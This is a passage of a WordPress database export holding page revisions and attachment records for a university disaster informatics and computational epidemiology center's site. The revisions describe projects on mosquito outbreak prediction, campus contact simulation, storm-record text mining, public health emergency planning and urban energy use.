class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-324 style-local-122-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c12\">\n <!---->\n <!---->\n <h4 class=\"\">Our Mission</h4>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c13 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c14-outer\">\n <div data-colibri-id=\"122-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c15\" class=\"h-text h-text-component style-319 style-local-122-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c20\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-04-15 11:03:42','2022-04-15 15:03:42','',122,'https://gsudice.dataconn.net/?p=1140',0,'revision','',0),(1153,1,'2022-04-18 11:49:17','2022-04-18 15:49:17','','BeforeSimulCast','','inherit','open','closed','','beforesimulcast','','','2022-04-18 11:49:17','2022-04-18 15:49:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/BeforeSimulCast.png',0,'attachment','image/png',0),(1154,1,'2022-04-18 11:49:37','2022-04-18 15:49:37','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast.png','cropped-BeforeSimulCast.png','','inherit','open','closed','','cropped-beforesimulcast-png','','','2022-04-18 11:49:37','2022-04-18 15:49:37','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast.png',0,'attachment','image/png',0),(1156,1,'2022-04-18 11:50:05','2022-04-18 15:50:05','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c4\",\"parentId\":\"126-c3\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c4\",\"index\":0,\"id\":\"126-c5\",\"partialId\":126,\"styleRef\":342,\"type\":\"content\",\"props\":{\"content\":\"AeMos: An Early Warning Systems for Aedes Mosquito Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c4\",\"index\":2,\"id\":\"126-c6\",\"partialId\":126,\"styleRef\":344,\"type\":\"content\",\"props\":{\"content\":\"<p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.<\\/p>\"}}],\"styleRef\":341,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c7\",\"parentId\":\"126-c3\",\"partialId\":126,\"styleRef\":345,\"type\":\"content\"}],\"id\":\"126-c3\",\"parentId\":\"126-c2\",\"partialId\":126,\"styleRef\":340,\"type\":\"content\"}],\"id\":\"126-c2\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":339,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, and hybrid is similar to our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2022-04-18 11:50:05','2022-04-18 15:50:05','',438,'https://gsudice.dataconn.net/?p=1156',0,'revision','',0),(1162,1,'2022-04-18 11:50:55','2022-04-18 15:50:55','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast-1.png','cropped-BeforeSimulCast-1.png','','inherit','open','closed','','cropped-beforesimulcast-1-png','','','2022-04-18 11:50:55','2022-04-18 15:50:55','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast-1.png',0,'attachment','image/png',0),(1164,1,'2022-04-18 11:51:02','2022-04-18 15:51:02','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c4\",\"parentId\":\"126-c3\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c4\",\"index\":0,\"id\":\"126-c5\",\"partialId\":126,\"styleRef\":342,\"type\":\"content\",\"props\":{\"content\":\"AeMos: An Early Warning Systems for Aedes Mosquito Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c4\",\"index\":2,\"id\":\"126-c6\",\"partialId\":126,\"styleRef\":344,\"type\":\"content\",\"props\":{\"content\":\"<p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.<\\/p>\"}}],\"styleRef\":341,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c7\",\"parentId\":\"126-c3\",\"partialId\":126,\"styleRef\":345,\"type\":\"content\"}],\"id\":\"126-c3\",\"parentId\":\"126-c2\",\"partialId\":126,\"styleRef\":340,\"type\":\"content\"}],\"id\":\"126-c2\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":339,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, and hybrid is similar to our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy 